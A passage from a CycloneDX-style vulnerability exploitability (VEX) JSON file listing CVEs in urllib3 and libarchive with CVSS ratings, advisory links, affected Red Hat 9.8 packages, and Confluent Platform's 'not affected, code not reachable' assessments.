      "published": "2025-05-15T14:15:31+00:00",
      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-50181",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50181"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50181"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
        }
      ],
      "published": "2025-06-19T01:15:24+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-50182",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50182"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50182"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50182"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
        }
      ],
      "published": "2025-06-19T02:15:17+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5915",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can lead to a heap buffer over-read due to the size of a filter block potentially exceeding the Lempel-Ziv-Storer-Schieber (LZSS) window. This means the library may attempt to read beyond the allocated memory buffer, which can result in unpredictable program behavior, crashes (denial of service), or the disclosure of sensitive information from adjacent memory regions.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5915"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5915"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370865"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2599"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5915"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
        }
      ],
      "published": "2025-06-09T20:15:26+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5916",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an integer overflow that can be triggered when processing a Web Archive (WARC) file that claims to have more than INT64_MAX - 4 content bytes. An attacker could craft a malicious WARC archive to induce this overflow, potentially leading to unpredictable program behavior, memory corruption, or a denial-of-service condition within applications that process such archives using libarchive. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5916"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5916"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370872"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568/commits/bce70c4c26864df2a8d6953e7db6e4b156253508"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5916"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
